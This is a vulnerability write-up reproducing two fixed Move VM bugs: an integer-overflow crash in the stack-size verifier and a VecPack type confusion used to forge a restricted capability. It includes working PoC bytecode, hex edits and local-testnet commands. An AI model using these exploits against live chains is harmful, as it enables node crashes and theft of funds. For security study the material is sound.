Reproducing Two Critical Bugs in the Move VM and Understanding Why They Happen

#1: The Crash Bug

A bug in the Move virtual machine can crash Aptos nodes and the applications that depend on them.

Introduction

https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e

The Move programming language is used in many well-known projects, like Aptos and Sui.

The Move virtual machine (MoveVM) works much like the Ethereum Virtual Machine (EVM): source code is compiled into bytecode, which is then executed in the virtual machine. Running a script goes through the following steps:

  • The bytecode is loaded through the execute_script function.
  • The load_script function deserializes the bytecode and verifies that it is legal; if verification fails, loading returns an error.
  • After successful verification, the bytecode is executed.
  • During execution, the bytecode reads or modifies the state of global storage, including resources and modules.

Verification Module

Before the bytecode is actually executed, it is verified. The verification is divided into several sub-passes:

  • *BoundsChecker* checks the bounds safety of the module or script, including the bounds of signatures, constants, and so on.
  • *DuplicationChecker* verifies that each vector in a CompiledModule contains distinct values.
  • *SignatureChecker* checks that signatures are well-formed when they are used for function parameters, local variables, and struct fields.
  • *InstructionConsistency* verifies instruction consistency.
  • *Constants* verifies that each constant has a type allowed for constants (primitives and vectors of them) and that its data is correctly serialized for that type.
  • *CodeUnitVerifier* verifies the correctness of function bodies, via stack_usage_verifier.rs and abstract_interpreter.rs respectively.
  • *script_signature* verifies that a script or entry function has a valid signature.
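
The passes listed above behave like a chain in which the first failure stops loading, so execution never starts on rejected bytecode. The following is a minimal Rust sketch of that idea only. Every name in it (`Module`, `bounds_check`, `duplication_check`, `verify`, `VerifyError`) is hypothetical and much simpler than the real move-bytecode-verifier code.

```rust
use std::collections::HashSet;

// Toy model: a "module" is a pool size plus a list of indices into that pool.
#[derive(Debug)]
struct Module {
    pool_len: usize,
    indices: Vec<usize>,
}

#[derive(Debug, PartialEq)]
enum VerifyError {
    IndexOutOfBounds(usize),
    DuplicateElement(usize),
}

// Stand-in for a bounds check: every index must point inside the pool.
fn bounds_check(m: &Module) -> Result<(), VerifyError> {
    match m.indices.iter().find(|&&i| i >= m.pool_len) {
        Some(&i) => Err(VerifyError::IndexOutOfBounds(i)),
        None => Ok(()),
    }
}

// Stand-in for a duplication check: no index may appear twice.
fn duplication_check(m: &Module) -> Result<(), VerifyError> {
    let mut seen = HashSet::new();
    for &i in &m.indices {
        if !seen.insert(i) {
            return Err(VerifyError::DuplicateElement(i));
        }
    }
    Ok(())
}

// Passes run in order; `?` returns at the first failing pass.
fn verify(m: &Module) -> Result<(), VerifyError> {
    bounds_check(m)?;
    duplication_check(m)?;
    Ok(())
}

fn main() {
    let good = Module { pool_len: 4, indices: vec![0, 1, 3] };
    let bad = Module { pool_len: 4, indices: vec![0, 7, 7] };
    println!("{:?}", verify(&good));
    println!("{:?}", verify(&bad));
}
```

Because the bounds pass runs first, the second module is rejected for its out-of-range index before the duplicate is ever examined. A bug inside a single pass, like the one discussed next, therefore affects everything that relies on that pass.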

CodeUnitVerifier

The vulnerability was in the stack size check performed when verifying blocks of code.

Specifically, stack_size_increment can be indirectly controlled by constructing an oversized num_pushes, resulting in an integer overflow vulnerability.

Reproduction

Install the aptos-cli tool:

$ curl -fsSL "https://aptos.dev/scripts/install_cli.py" | python3

Run a local Aptos node:

$ git clone git@github.com:aptos-labs/aptos-core.git ~/aptos-core && cd ~/aptos-core

$ cargo run -p aptos -- node run-local-testnet --with-faucet --faucet-port 8081 --force-restart --assume-yes

PoC bytecode file

Disassemble the bytecode. The instructions at offsets 1 and 2 are both VecUnpack instructions.

VecUnpack pushes all elements of a vector onto the stack. The instruction unpacks a statically known number of elements, given as its second operand.

Thus, these two instructions make the VM add 3315214543476364830 and 18394158839224997406 via stack_size_increment += num_pushes;. The sum, 21709373382701362236, is greater than the maximum value of u64 (18446744073709551615). This triggers Rust's arithmetic overflow panic and crashes the Aptos node.
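
The arithmetic can be checked with a short Rust sketch. It is not the verifier's code: the function names are hypothetical, and the slice stands in for the num_pushes values of the two VecUnpack instructions in the PoC. In Rust, a plain `+=` on a u64 panics on overflow when overflow checks are enabled (the default in debug builds), while `checked_add` reports the overflow as `None` so the caller can return an error instead.

```rust
// Hypothetical stand-in for accumulating num_pushes within one block.
// checked_add returns None on overflow instead of panicking or wrapping.
fn stack_increment_checked(num_pushes: &[u64]) -> Option<u64> {
    num_pushes.iter().try_fold(0u64, |acc, &n| acc.checked_add(n))
}

// What the sum would be if overflow silently wrapped modulo 2^64.
fn stack_increment_wrapping(num_pushes: &[u64]) -> u64 {
    num_pushes.iter().fold(0u64, |acc, &n| acc.wrapping_add(n))
}

fn main() {
    // The two VecUnpack element counts from the PoC disassembly.
    let pushes = [3315214543476364830u64, 18394158839224997406u64];

    match stack_increment_checked(&pushes) {
        Some(total) => println!("total pushes: {}", total),
        None => println!("overflow detected: reject the script"),
    }
    println!("wrapped sum: {}", stack_increment_wrapping(&pushes));
}
```

Either outcome is wrong for a verifier if left unhandled: a panic takes the node down, and a wrapped value would make the stack-size check compare against a meaningless number.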

$ move new Test
$ cp 1.mv Test/
$ cd Test
$ move sandbox view 1.mv

// Move bytecode v4
script {

main<Ty0: drop, Ty1: drop>(Arg0: u8) {
B0:
0: LdU64(3323940208748926750)
1: VecUnpack(2, 3315214543476364830)
2: VecUnpack(2, 18394158839224997406)
3: Ret
B1:
4: Ret
B2:
5: Ret
B3:
6: Ret
B4:
7: Ret
B5:
8: Ret
B6:
9: Ret
B7:
10: Ret
B8:
11: Ret
B9:
12: Ret
B10:
13: Ret
B11:
14: Ret
B12:
15: Ret
B13:
16: Ret
B14:
17: Ge
18: Ret
B15:
19: Or
20: Sub
21: Or
22: VecPopBack(2)
23: Ret
B16:
24: FreezeRef
25: VecUnpack(2, 163587547629229598)
26: Ret
B17:
27: Ret
B18:
28: Ret
B19:
29: Ret
B20:
30: Ret
B21:
31: Or
32: Or
33: Sub
34: Ret
B22:
35: FreezeRef
36: VecPopBack(2)
37: Ret
}
}

Crash the node:

$ aptos move run-script --compiled-script-path 1.mv

The node backend logs show:

#2: The Loss of Funds Bug / Type Confusion Bug

A bug in the Move virtual machine can cause loss of funds in Aptos applications through type confusion.

Introduction

Let's first look at the README for the bytecode verifier in the Move repo: https://github.com/move-language/move/tree/96d7dd69c5fe2e1aa2c36831c8d0154c3e3acfe0/language/move-bytecode-verifier

The bug occurs in the type safety checking stage.

Type Safety

The second phase of the analysis checks that each operation, primitive or defined function, is invoked with arguments of appropriate types. The operands of an operation are values located either in a local variable or on the stack. The types of local variables of a function are already provided in the bytecode. However, the types of stack values are inferred. This inference and the type checking of each operation can be done separately for each block. Since the stack height at the beginning of each block is n and does not go below n during the execution of the block, we only need to model the suffix of the stack starting at n for type checking the block instructions. We model this suffix using a stack of types on which types are pushed and popped as the instruction stream in a block is processed. Only the type stack and the statically-known types of local variables are needed to type check each instruction.

The fix commit adds a check to the VecPack operator. The previous code did not check that the operands being packed have the vector's element type, while the fixed code does.

Let's see how VecPack works in the Move VM.

aptos move init --name test_move

module test::test_move {
    use std::vector;

    public fun test() {
        let v = vector::empty<u64>();
        vector::push_back(&mut v, 5);
    }
}

move disassemble --name test_move

module cafe.test_move {


public test() {
L0: v: vector<u64>
B0:
0: VecPack(2, 0)
1: StLoc[0](v: vector<u64>)
2: MutBorrowLoc[0](v: vector<u64>)
3: LdU64(5)
4: VecPushBack(2)
5: Ret
}
}

The first instruction is VecPack, which initializes a vector. Its first parameter is a type index, which is resolved to a concrete type at compile time; in this example, the vector's element type is u64. Its second parameter is the number of elements used to initialize the vector. Because we use vector::empty<u64>() here, there are no elements to initialize the vector with, so the parameter is 0. If we used vector<u64>[0,1,2]; instead, the second parameter would be 3.
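
The role of the element count can be modeled with a toy operand stack in Rust. This is only a sketch: `vec_pack` and `vec_unpack` are hypothetical functions, values are plain u64, the type index is left out, and it assumes that the first value pushed becomes element 0 and that unpacking fails when the vector length differs from the declared count.

```rust
// Pop `n` operands from the toy stack and return them as one vector.
fn vec_pack(stack: &mut Vec<u64>, n: usize) -> Option<Vec<u64>> {
    if stack.len() < n {
        return None; // not enough operands on the stack
    }
    // split_off keeps push order, so the first value pushed is element 0.
    Some(stack.split_off(stack.len() - n))
}

// Inverse operation: push every element back, but only if the vector
// really has the statically declared length `n`.
fn vec_unpack(stack: &mut Vec<u64>, v: Vec<u64>, n: usize) -> Result<(), String> {
    if v.len() != n {
        return Err(format!("expected {} elements, found {}", n, v.len()));
    }
    stack.extend(v);
    Ok(())
}

fn main() {
    // Roughly what vector<u64>[0, 1, 2] needs: three pushes, then a pack of 3.
    let mut stack = vec![0u64, 1, 2];
    let v = vec_pack(&mut stack, 3).expect("enough operands");
    println!("packed {:?}, stack now {:?}", v, stack);

    // vector::empty<u64>() corresponds to n = 0: nothing is popped.
    let empty = vec_pack(&mut stack, 0).expect("n = 0 always succeeds");
    println!("empty vector: {:?}", empty);

    vec_unpack(&mut stack, v, 3).expect("length matches");
    println!("after unpack: {:?}", stack);
}
```

The sketch tracks only counts. What the real verifier must additionally track is the type of every popped operand, which is the part that was missing.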

// Move bytecode v5
module cafe.test_move {


public test() {
L0: a: u8
L1: num: u8
L2: v: vector<u8>
B0:
0: VecPack(2, 0)
1: StLoc[2](v: vector<u8>)
2: MutBorrowLoc[2](v: vector<u8>)
3: LdU8(1)
4: VecPushBack(2)
5: MutBorrowLoc[2](v: vector<u8>)
6: VecPopBack(2)
7: StLoc[0](a: u8)
8: ImmBorrowLoc[0](a: u8)
9: Call[0](print<u8>(&u8))
10: Ret
}
}

That concludes the introduction to VecPack. Now let's reproduce the vulnerability with an example.

Reproduction

First, clone the aptos project:

git clone https://github.com/aptos-labs/aptos-core.git

Switch to an older commit.

git checkout 649fb13e021f8e6a4d28c3410767a9af6106dbb1
git switch -c fixed

The code at this commit already contains the fix, so we need to swap in the vulnerable Move version:

Replace every occurrence of "77750b37bb3663d00a7c4058937fed42ceb3089e" with "59265662d0a44ba53b09ba3c4b2248efdf08c622" in the repo.

Replace every occurrence of "github.com/aptos-labs/move" with "github.com/move-language/move" in the repo.

git add *
git commit -m "replace vulnerable move commit 59265662d0a44ba53b09ba3c4b2248efdf08c622"

Next, open a tmux session and set up a local Aptos test environment with the following command:

cargo run --release -p aptos -- node run-local-testnet --with-faucet --faucet-port 8081 --force-restart --assume-yes

This command also builds an aptos-cli binary at aptos-core/target/release/aptos, which we use to interact with the validator node.

We can copy this tool into a directory on our shell path: cp target/release/aptos ~/bin

Open another tmux session and publish the module to the Aptos network.

aptos init
aptos account fund-with-faucet --account default --amount 100000000

Next, we publish a coin called TestCoin to the local Aptos network.

TestCoin code:

module TestCoin::test_coin {

    use aptos_framework::coin;
    use std::debug;
    use std::signer;

    struct TestCoin {}

    struct OneCap has drop {}

    struct TwoCap has drop {}

    fun init_module(sender: &signer) {
        aptos_framework::managed_coin::initialize<TestCoin>(
            sender,
            b"Test Coin",
            b"Test",
            6,
            false,
        );
    }

    public entry fun balance_of(owner: address) {
        let balance = coin::balance<TestCoin>(owner);
        debug::print(&balance);
    }

    public fun get_one_cap(): OneCap {
        return OneCap{}
    }

    public fun get_two_cap(): TwoCap {
        return TwoCap{}
    }

    public fun test(one_cap: OneCap) {
        debug::print(&b"hello");
    }
}

We mainly focus on the two structs defined here: one is called OneCap, the other TwoCap.

We also have a function called test, which takes a OneCap parameter and prints "hello" when invoked.

aptos move publish --named-addresses TestCoin=default

As the fix commit shows, we can use VecPack to pack an element of one type into a vector of another, targeted type. Unpacking this vector later gives us a value of the targeted type.

Our original script looks like this:

script {
    use std::vector;

    fun poc(account: &signer) {
        let onecap = TestCoin::test_coin::get_one_cap();
        let twocap = TestCoin::test_coin::get_two_cap();
        let v = vector[twocap];
        TestCoin::test_coin::test(onecap);
    }
}

This is a valid script: we get a OneCap instance and call test with it.

Here are the details of the compiled bytecode (Move provides a document explaining its bytecode format: https://github.com/move-language/move/blob/main/language/documentation/spec/vm.md):

MAGIC
a11c eb0b

VERSION
0500 0000

TABLE_COUNT
06

MODULE_HANDLES
01 00 02 -> 00 00

STRUCT_HANDLES
02 02 08 -> 00 01 02 00
00 02 02 00

FUNCTION_HANDLES
03 0A 0F -> 00 03 02 03 00 -> get_one_cap()
00 04 02 04 00 -> get_two_cap()
00 05 03 02 00 -> test(cap)

SIGNATURES
05 19 12 -> 01 06 0c -> signer
03 08 00 08 01 0A 08 01 ->
00
01 08 00 -> OneCap
01 08 01 -> TwoCap

IDENTIFIERS
07 2B 35 -> 09 6d 6f 6f 6e 5f 63 6f 69 6e moon_coin
06 4f 6e 65 43 61 70 OneCap
06 54 77 6F 43 61 70 TwoCap
0b 67 65 74 5f 6f 6e 65 5f 63 61 70 get_one_cap
0b 67 65 74 5f 74 77 6f 5f 63 61 70 get_two_cap
04 74 65 73 74 test

ADDRESS_IDENTIFIERS
08 60 20 -> 7fde 7f3f aac1 6e02 1829 c3b9 0f2f 65cd d13d 209b 55e5 2ded 1944 31c0 a4ec 6e63

Code Head
0000 010a

Code Content
1100 CALL(index->FUNCTION_HANDLES)
0c01 ST_LOC(index->register)
1101 CALL(index->FUNCTION_HANDLES)
0c02 ST_LOC(index->register)
0b02 MOVE_LOC(index->register)
4004 01000000 00000000 VEC_PACK(index->SIGNATURES, length)
01 POP
0b01 MOVE_LOC(index->register)
1102 CALL(index->FUNCTION_HANDLES)
02 RET
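
The Code Content listing above can be reproduced mechanically. Below is a minimal Rust sketch of a decoder covering only the seven opcodes that appear in that listing. The `Instr` enum and `decode` function are hypothetical names, and the sketch assumes every index fits in a single byte (true for this script) and that the vector length is an 8-byte little-endian integer, as the listing suggests.

```rust
#[derive(Debug, PartialEq)]
enum Instr {
    Pop,
    Ret,
    MoveLoc(u8),
    StLoc(u8),
    Call(u8),
    VecPack(u8, u64),
    VecUnpack(u8, u64),
}

// Decode the raw code bytes into instructions, using the opcode values
// shown in the listing (0x01 POP, 0x02 RET, 0x0b MOVE_LOC, 0x0c ST_LOC,
// 0x11 CALL, 0x40 VEC_PACK, 0x46 VEC_UNPACK).
fn decode(bytes: &[u8]) -> Result<Vec<Instr>, String> {
    let mut out = Vec::new();
    let mut i = 0;
    while i < bytes.len() {
        let op = bytes[i];
        i += 1;
        let instr = match op {
            0x01 => Instr::Pop,
            0x02 => Instr::Ret,
            0x0b | 0x0c | 0x11 => {
                // One single-byte index operand.
                let idx = *bytes.get(i).ok_or("truncated operand")?;
                i += 1;
                match op {
                    0x0b => Instr::MoveLoc(idx),
                    0x0c => Instr::StLoc(idx),
                    _ => Instr::Call(idx),
                }
            }
            0x40 | 0x46 => {
                // Signature index, then the element count as u64 little-endian.
                let idx = *bytes.get(i).ok_or("truncated operand")?;
                let raw = bytes.get(i + 1..i + 9).ok_or("truncated length")?;
                let mut len_bytes = [0u8; 8];
                len_bytes.copy_from_slice(raw);
                let len = u64::from_le_bytes(len_bytes);
                i += 9;
                if op == 0x40 {
                    Instr::VecPack(idx, len)
                } else {
                    Instr::VecUnpack(idx, len)
                }
            }
            other => return Err(format!("unknown opcode 0x{:02x}", other)),
        };
        out.push(instr);
    }
    Ok(out)
}

fn main() {
    // The Code Content bytes of the original script.
    let code = [
        0x11, 0x00, 0x0c, 0x01, 0x11, 0x01, 0x0c, 0x02, 0x0b, 0x02,
        0x40, 0x04, 0x01, 0, 0, 0, 0, 0, 0, 0,
        0x01, 0x0b, 0x01, 0x11, 0x02, 0x02,
    ];
    let instrs = decode(&code).expect("valid code bytes");
    for (offset, instr) in instrs.iter().enumerate() {
        println!("{}: {:?}", offset, instr);
    }
    println!("instruction count: {}", instrs.len());
}
```

The decoded instruction count is 10, which matches the final byte (0a) of the Code Head shown above. That byte is the one to adjust whenever instructions are added or removed by hand.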

Let’s directly run this script first.

aptos move run-script --compiled-script-path build/TestCoin/bytecode_scripts/poc.mv  --framework-local-dir ~/move-language/aptos-core/aptos-move/framework/aptos-framework

The test function will be invoked normally.

Now, let's try to call the test function directly with a TwoCap instance.

We can do this by modifying the code section in bytecode like below.

Code Content
1100 CALL(index->FUNCTION_HANDLES)
0c01 ST_LOC(index->register)
1101 CALL(index->FUNCTION_HANDLES)
0c02 ST_LOC(index->register)
0b02 MOVE_LOC(index->register)
4004 01000000 00000000 VEC_PACK(index->SIGNATURES, length)
4604 01000000 00000000 VEC_UNPACK(index->SIGNATURES, length)
1102 CALL(index->FUNCTION_HANDLES)
02 RET

(Don't forget to also change the number of instructions in the code header.)

After modification, we get the bytecode:

aptos move run-script --compiled-script-path test_poc.mv  --framework-local-dir ~/move-language/aptos-core/aptos-move/framework/aptos-framework

Unsurprisingly, we get an error:

{
"Error": "Simulation failed with status: Transaction Executed and Committed with Error CALL_TYPE_MISMATCH_ERROR"
}

This happens because the element in the vector has type TwoCap: we unpack this TwoCap onto the stack and pass it as the argument to test, which expects a OneCap.

But as mentioned before, VecPack is missing a check when packing the elements. We can change the type index in both the VecPack and the VecUnpack instruction (from 04, TwoCap, to 03, OneCap, in the SIGNATURES table above). We can then forge a OneCap from a TwoCap using vector operations.

aptos move run-script --compiled-script-path test_poc1.mv  --framework-local-dir ~/move-language/aptos-core/aptos-move/framework/aptos-framework

We successfully call the test() function.

Now that we understand the bug, we can simplify the code:

  1. Call get_two_cap(); the return value is pushed onto the stack.
  2. VecPack the value on the stack, using the OneCap signature index.
  3. VecUnpack the vector back onto the stack; the value is now treated as a OneCap.
  4. Call test() with the value on the stack.
  5. Ret.

1101 CALL(index->FUNCTION_HANDLES)
4003 01000000 00000000 VEC_PACK(index->SIGNATURES, length)
4603 01000000 00000000 VEC_UNPACK(index->SIGNATURES, length)
1102 CALL(index->FUNCTION_HANDLES)
02 RET
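
To see why these five instructions pass a verifier without the operand check, they can be run through a toy type-stack model. The Rust sketch below is an illustration under assumptions, not the Move verifier. The `Ty` and `Instr` types, the `type_check` function, and the lowercase error strings are hypothetical; only CALL_TYPE_MISMATCH_ERROR is taken from the error output shown earlier. The `check_vec_pack_operands` flag switches between the behavior described for the code before and after the fix.

```rust
#[derive(Clone, Debug, PartialEq)]
enum Ty {
    Struct(&'static str),
    Vector(Box<Ty>),
}

enum Instr {
    // A call pops its parameters and pushes its return values.
    Call { params: Vec<Ty>, ret: Vec<Ty> },
    VecPack(Ty, usize),
    VecUnpack(Ty, usize),
    Ret,
}

// Type-check a straight-line instruction sequence on an abstract type stack.
fn type_check(code: &[Instr], check_vec_pack_operands: bool) -> Result<(), String> {
    let mut stack: Vec<Ty> = Vec::new();
    for instr in code {
        match instr {
            Instr::Call { params, ret } => {
                // Arguments are popped last-parameter-first.
                for p in params.iter().rev() {
                    match stack.pop() {
                        Some(t) if &t == p => {}
                        _ => return Err("CALL_TYPE_MISMATCH_ERROR".to_string()),
                    }
                }
                stack.extend(ret.iter().cloned());
            }
            Instr::VecPack(elem, n) => {
                for _ in 0..*n {
                    let t = stack.pop().ok_or("stack underflow")?;
                    // The check that was missing: operand type must equal `elem`.
                    if check_vec_pack_operands && &t != elem {
                        return Err("vec_pack operand mismatch".to_string());
                    }
                }
                stack.push(Ty::Vector(Box::new(elem.clone())));
            }
            Instr::VecUnpack(elem, n) => {
                match stack.pop() {
                    Some(Ty::Vector(inner)) if *inner == *elem => {}
                    _ => return Err("vec_unpack operand mismatch".to_string()),
                }
                for _ in 0..*n {
                    stack.push(elem.clone());
                }
            }
            Instr::Ret => return Ok(()),
        }
    }
    Ok(())
}

// The simplified PoC: get_two_cap, VecPack/VecUnpack as OneCap, test, ret.
fn poc() -> Vec<Instr> {
    let one = Ty::Struct("OneCap");
    let two = Ty::Struct("TwoCap");
    vec![
        Instr::Call { params: vec![], ret: vec![two] },
        Instr::VecPack(one.clone(), 1),
        Instr::VecUnpack(one.clone(), 1),
        Instr::Call { params: vec![one], ret: vec![] },
        Instr::Ret,
    ]
}

fn main() {
    println!("without operand check: {:?}", type_check(&poc(), false));
    println!("with operand check:    {:?}", type_check(&poc(), true));
}
```

Without the operand check, the model accepts the sequence because the TwoCap is relabeled as a OneCap when it passes through the vector. With the check enabled, the sequence is rejected at the VecPack step, before test() is ever reached.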

Our PoC works.

Moreover, it seems this only works with structs. I further tested changing u64 to u128 and it failed: the internal implementation raises an INTERNAL_TYPE_ERROR when casting u64 to u128.

This can happen in a real-world application when OneCap is a capability type that should be restricted, like MintCapability, and TwoCap is an unrestricted one, like ViewBalanceCapability.

It can then easily cause loss of funds or other severe consequences.